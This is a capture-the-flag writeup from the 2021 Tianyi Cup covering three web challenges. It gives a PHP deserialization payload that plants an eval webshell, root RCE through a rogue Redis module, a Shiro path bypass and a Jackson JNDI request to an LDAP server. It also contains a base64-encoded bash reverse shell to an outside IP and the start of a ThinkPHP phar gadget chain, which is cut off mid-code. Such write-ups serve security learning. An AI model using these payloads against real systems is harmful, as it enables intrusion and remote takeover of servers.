
Title: 2021 Second "Tianyi Cup" Network Security Offensive and Defensive Competition Writeup


Web

1.esay_eval

```php
<?php
class A{
    public $code='';
    function __call($method,$args){
        eval($this->code);
    }
    function __wakeup(){
        $this->code='';
    }
}
class B{
    function __destruct(){
        echo $this->a->a();
    }
}
if(isset($_REQUEST['poc'])){
    preg_match_all('/"[BA]":(.*?):/s',$_REQUEST['poc'],$ret);
    if (isset($ret[1])) {
        foreach ($ret[1] as $i) {
            if(intval($i)!==1){
                exit("you want to bypass wakeup ? no !");
            }
        }
        unserialize($_REQUEST['poc']);
    }
}else{
    highlight_file(__FILE__);
}
```

Brief analysis: B::__destruct calls $this->a->a(). If $a is an A object, the missing method a() lands in A::__call, which eval()s $this->code. The only obstacle is A::__wakeup, which clears $code during unserialize(), so the task is to bypass __wakeup.

For preg_match_all() see: php preg_match_all() function introduction and usage - Feiniao Muyu Blog (feiniaomy.com).

Finally, every value captured into $ret[1] must equal 1, because of the intval($i)!==1 check that follows. The regex only matches the uppercase class names "A" and "B", and while PHP variable names are case sensitive, function, method and class names are not. So writing the inner class name as lowercase "a" keeps preg_match_all from matching that object, while unserialize() still instantiates class A. Only one object needs to escape the check, since only A::__wakeup has to be bypassed: declaring more properties than are actually present makes unserialize() give up before __wakeup is called, while B::__destruct still fires when the partially built objects are freed.

Construct payload

```php
<?php

class A{
    public $code='';
    public function __construct(){
        // backslash keeps PHP from interpolating $_POST while building the string
        $this->code="eval(\$_POST[1]);";
    }
}

class B{
    public function __construct(){
        $this->a=new A();
    }
}

echo serialize(new B());
```

The backslash is put in front of the $ so that PHP does not interpolate the variable while the payload string is being built.

This gives O:1:"B":1:{s:1:"a";O:1:"A":1:{s:4:"code";s:19:"eval($_REQUEST[1]);";}} (the screenshot used $_REQUEST[1] as the body). Change the inner class name to lowercase and bump its property count to skip __wakeup: O:1:"B":1:{s:1:"a";O:1:"a":2:{s:4:"code";s:19:"eval($_REQUEST[1]);";}}. Then connect with AntSword to get a shell.

Code audit: a direct deserialization payload gives a one-line webshell.

Lowercase class name a for the bypass.

payload

```
?poc=O:1:"B":1:{s:1:"a";O:1:"a":2:{s:4:"code";s:16:"eval($_POST[0]);";}}
```

Connecting with AntSword showed that disable_functions is set. I tried the bypass shipped with AntSword, and then found config.php.swp (a vi swap file, recoverable with vi -r) in the web root, from which I found the redis password.
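The gate and the bypass above can be checked offline. The following is an added example written for this page, not code from the original writeup: a minimal PHP serialize() for objects with public properties (with the option to declare a wrong property count), a re-implementation of the challenge's preg_match_all/intval gate, and a builder for the three payload variants discussed (naive, uppercase A with count 2, lowercase a with count 2). The names PhpObject, build_poc and gate_accepts are this example's own; the regex and the webshell body are the ones on the page.

```python
import re


class PhpObject:
    """A PHP object to serialize: class name plus ordered public properties.
    declared_count lets the emitted property count differ from the real one,
    which is the __wakeup bypass used in the writeup."""

    def __init__(self, cls, props, declared_count=None):
        self.cls = cls
        self.props = props
        self.declared_count = declared_count


def php_serialize(value):
    """Minimal serialize(): bool, int, str and PhpObject with public properties."""
    if isinstance(value, bool):
        return "b:%d;" % int(value)
    if isinstance(value, int):
        return "i:%d;" % value
    if isinstance(value, str):
        return 's:%d:"%s";' % (len(value.encode()), value)
    if isinstance(value, PhpObject):
        count = len(value.props) if value.declared_count is None else value.declared_count
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.props.items())
        return 'O:%d:"%s":%d:{%s}' % (len(value.cls), value.cls, count, body)
    raise TypeError("unsupported type %r" % type(value))


def php_intval(s):
    """PHP intval() on a string: leading integer, else 0."""
    m = re.match(r"\s*[+-]?\d+", s)
    return int(m.group()) if m else 0


# The challenge's gate: /"[BA]":(.*?):/s captures the property count that
# follows every uppercase "A" or "B" class name; each one must be exactly 1.
GATE = re.compile(r'"[BA]":(.*?):', re.S)


def gate_accepts(poc):
    return all(php_intval(i) == 1 for i in GATE.findall(poc))


def build_poc(body="eval($_POST[0]);", lowercase_class=True, wrong_count=True):
    """Serialized B{a: A{code: body}}.
    lowercase_class: write the inner class as "a"; PHP resolves it to A (class
      names are case-insensitive) but the gate's [BA] never sees it.
    wrong_count: declare 2 properties while emitting 1, so unserialize() fails
      after the objects exist; __wakeup (which would clear $code) is skipped,
      but B::__destruct still runs on teardown -> A::__call -> eval()."""
    inner = PhpObject("a" if lowercase_class else "A",
                      {"code": body},
                      declared_count=2 if wrong_count else None)
    return php_serialize(PhpObject("B", {"a": inner}))


if __name__ == "__main__":
    for lc, wc in ((False, False), (False, True), (True, True)):
        poc = build_poc(lowercase_class=lc, wrong_count=wc)
        print("%-5s %s" % (gate_accepts(poc), poc))
```

The first variant passes the gate but __wakeup empties $code; the second skips __wakeup but the gate captures "2" and exits; only the third both passes the gate and keeps $code, and it is byte-for-byte the ?poc= payload above.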

Upload the malicious .so from the Redis RCE project on GitHub (linked below) to /tmp, then load it as a Redis module through AntSword's Redis plugin to get RCE.

Redis loads the malicious .so and we get a shell.

AntSword found a config swap file; recover it.

Download it to a Linux box and recover it with vi:

```shell
vi -r config.php
```

This redis password looks far too fake, but it is real. Connect with AntSword's Redis plugin.

Then I went after Redis. I found open_basedir set in phpinfo, but /tmp is still usable, so I uploaded the malicious .so there.

https://github.com/Dliv3/redis-rogue-server

Upload it directly with AntSword.

Connect to Redis with the Redis plugin:

```
127.0.0.1:6379> module load /tmp/exppadding.so
OK
127.0.0.1:6379> system.exec "id"
"uid=0(root) gid=0(root) groups=0(root)\n"
```

Attached local environment (Dockerfile):

```dockerfile
FROM ubuntu:16.04

COPY src/sources.list /etc/apt/sources.list
COPY src/redis-4.0.9 /home/redis-4.0.9

RUN apt-get update && apt-get install -y curl \
    software-properties-common \
    python3-software-properties \
    python-software-properties \
    unzip \
    vim

RUN apt-get install -y apache2
RUN service apache2 restart

RUN locale -a
RUN export LANG=C.UTF-8 && add-apt-repository ppa:ondrej/php && apt-get update

RUN apt-get install -y libapache2-mod-php7.0 \
    libzend-framework-php \
    php7.0-cli \
    php7.0 \
    php7.0-bcmath \
    php7.0-bz2 \
    php7.0-cgi \
    php7.0-common \
    php7.0-fpm \
    php7.0-gmp \
    php-http \
    php-imagick \
    php7.0-intl \
    php7.0-json \
    php7.0-mbstring \
    php-memcache \
    php-memcached \
    php7.0-mysql \
    php7.0-recode \
    php7.0-gd \
    php7.0-mcrypt \
    php7.0-xml \
    php7.0-pdo \
    php7.0-opcache \
    php7.0-curl \
    php7.0-zip

RUN apt install -y gcc make

RUN cd /home/redis-4.0.9 && cp -r /home/redis-4.0.9 /usr/local/redis \
    && cd /usr/local/redis && make && make PREFIX=/usr/local/redis install \
    && export REDIS_HOME=/usr/local/redis && export PATH=$PATH:$REDIS_HOME/bin

COPY src /tmp/src
RUN mv /tmp/src/web.ini /etc/php/7.0/apache2/conf.d/php.ini \
    && rm -rf /var/www/html \
    && mv /tmp/src/html /var/www/html \
    && mv /tmp/src/start.sh /start.sh \
    && chmod +x /start.sh

EXPOSE 80

CMD ["/start.sh"]
```

Here web.ini is the PHP configuration file, which is where disable_functions and similar settings are applied.

2.jackson

I won't go over the original challenge:

https://www.redmango.top/article/61#javaweb

First look at the pom.xml provided with the challenge.

It has shiro 1.5.1 and commons-collections 3.2.1, and the challenge is called jackson.

So the intended path should be: bypass Shiro's authentication to reach the route, then deserialize a CC chain through Jackson.

I found a /json route that requires login; /;/json bypasses it.

Then use the tool directly: https://github.com/welk1n/JNDI-Injection-Exploit

```shell
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A "47.100.27.114" -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMDAuMjcuMTE0LzgwODggMD4mMQ==}|{base64,-d}|{bash,-i}"
```

Alternatively, seeing the Shiro version in pom.xml brings CVE-2020-1957 to mind.

Reference: 2021 Second "Tianyi Cup" Network Security Offensive and Defensive Competition Writeup by X1cT34m-小绿草信息安全实验室 (Xiaolücao Information Security Lab).

Jackson deserialization + JNDI injection + LDAP returning serialized data to trigger a local gadget, bypassing the JDK 8u191 restriction:

```http
POST /;/json HTTP/1.1
Host: 8.134.37.86:20947
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/json
Content-Length: 97

["ch.qos.logback.core.db.JNDIConnectionSource",{"jndiLocation":"ldap://106.15.250.209:8091/abc"}]
```

The nc listener receives the reverse shell; read the flag in the root directory.
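Why /;/json reaches a handler that /json does not is a path-parsing mismatch between Shiro and Spring. The following is an added example for this page, not code from the writeup or from either project: a small Python model of Shiro 1.5.1's request-URI cleanup (cut at the first ';', then normalize) beside Spring's UrlPathHelper (strip ';...' per path segment, then squash '//'), plus a builder for the Jackson request body above. The filter chain (only /json protected by authc, everything else anonymous) is an assumption made for the demonstration; the class name and LDAP URL in the body are the page's.

```python
import json


def normalize(path):
    """Shiro's normalize(): backslashes to slashes, collapse '//', drop '.',
    resolve '..'. Sufficient for the URIs discussed here."""
    out = []
    for seg in path.replace("\\", "/").split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if out:
                out.pop()
            continue
        out.append(seg)
    return "/" + "/".join(out)


def shiro_request_path(uri):
    """Model of Shiro 1.5.1 WebUtils.getRequestUri(): everything from the
    first ';' onward is dropped (decodeAndCleanUriString), then normalized."""
    semi = uri.find(";")
    if semi != -1:
        uri = uri[:semi]
    return normalize(uri)


def spring_lookup_path(uri):
    """Model of Spring's UrlPathHelper: remove ';...' only up to the next '/'
    in each segment (removeSemicolonContent), then squash '//' (getSanitizedPath)."""
    semi = uri.find(";")
    while semi != -1:
        slash = uri.find("/", semi)
        uri = uri[:semi] + (uri[slash:] if slash != -1 else "")
        semi = uri.find(";", semi)
    while "//" in uri:
        uri = uri.replace("//", "/")
    return uri


# Assumed filter chain for the challenge: /json requires authc; a path that
# matches no chain entry gets no filter and is treated as anonymous here.
FILTER_CHAIN = {"/json": "authc"}


def route_decision(uri):
    """(filter Shiro applies, handler path Spring dispatches to) for one URI."""
    return FILTER_CHAIN.get(shiro_request_path(uri), "anon"), spring_lookup_path(uri)


def jndi_body(ldap_url):
    """Jackson polymorphic-typing body from the writeup: the first array slot
    names the class Jackson instantiates, jndiLocation carries the LDAP URL."""
    payload = ["ch.qos.logback.core.db.JNDIConnectionSource",
               {"jndiLocation": ldap_url}]
    return json.dumps(payload, separators=(",", ":"))


if __name__ == "__main__":
    for uri in ("/json", "/;/json"):
        print(uri, "->", route_decision(uri))
    body = jndi_body("ldap://106.15.250.209:8091/abc")
    print(len(body), body)
```

Shiro authorizes "/" (no filter, so the request is let through) while Spring dispatches "/json"; that is the whole bypass. The body builder reproduces the 97-byte Content-Length of the captured request.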

3.ezTP

Get the www.zip source code through robots.txt:

Directory structure (screenshot).

It is obviously a ThinkPHP application, and the version is 5.0.10.

At first I tried the ThinkPHP RCE, but it got nowhere, so I gave up on that.

Then look at the controllers: there is an Index and an Admin.

Admin controller (screenshot).

Index controller (screenshot).

It seems like there is no problem.

However, the upload and directory-listing operations in the Admin controller require being logged in as admin.

So SQL injection is needed; a Baidu search turns up an injection for this ThinkPHP version:

TP framework injection for this version: https://www.cnblogs.com/wangtanzhi/p/12734685.html

Use the injection to log in to the admin account.

Then look at listdir in the Admin controller: its is_dir() call can trigger phar deserialization.

Reference: https://www.anquanke.com/post/id/251318#h2-1

However, the POC from the link above, like the other public POCs, does not work here.

I debugged the local environment and found that:

Process.php close method (screenshot):

Unlike stock ThinkPHP, an if check has been added as a filter. The HasMany class used by the public chain has no close method, so $this->processPipes->close() is never reached, the rest of the chain (the deserialization that leads to a file write and RCE) never runs, and the public POCs fail.

What is needed is a class that has a close() method and internally calls close() on one of its member variables.

That gets past the filter and lets the deserialization chain continue.

Here I found the Memcache class.

Just attach the original chain to its $this->handler property and the deserialization continues.

But through debugging I found that the written file's path could not be located afterwards, so I changed it to an absolute path and wrote into the public directory.

Deserialize POC:

```php
<?php
namespace think;

use think\session\driver\Memcache;

class Process
{
    private $processPipes;
    private $status;
    private $processInformation;

    public function __construct()
    {
        $this->processInformation['running'] = true;
        $this->status = 3;
        $this->processPipes = new Memcache(1);
    }
}

namespace think;

class Model
{
}

namespace think\model;

use think\Model;

class Merge extends Model
{
    public $a = '1';

    public function __construct()
    {
    }
}

namespace think\model\relation;

use think
```
